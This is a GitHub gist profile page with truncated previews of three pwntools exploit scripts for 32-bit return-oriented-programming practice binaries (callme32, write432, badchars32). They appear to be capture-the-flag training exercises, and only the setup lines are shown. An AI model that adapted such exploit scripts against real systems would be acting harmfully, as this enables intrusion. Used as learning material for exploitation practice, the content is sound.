Skip to content

Instantly share code, notes, and snippets.

View ywkw1717's full-sized avatar
🌴
On vacation

yyy ywkw1717

🌴
On vacation
View GitHub Profile
#!/usr/bin/env python
from pwn import *
context(os="linux", arch="i386")
def main():
conn = process('./callme32')
argument = "\x01\x00\x00\x00" + \
#!/usr/bin/env python
from pwn import *
context(os="linux", arch="i386")
def main():
conn = process('./write432')
system = 0x08048430
@ywkw1717
ywkw1717 / badchars32-exploit.py
Last active December 6, 2017 18:23
badchars32
#!/usr/bin/env python
# coding: utf-8
from pwn import *
context(os="linux", arch="i386")
#
# badchars are: b i c / <space> f n s
#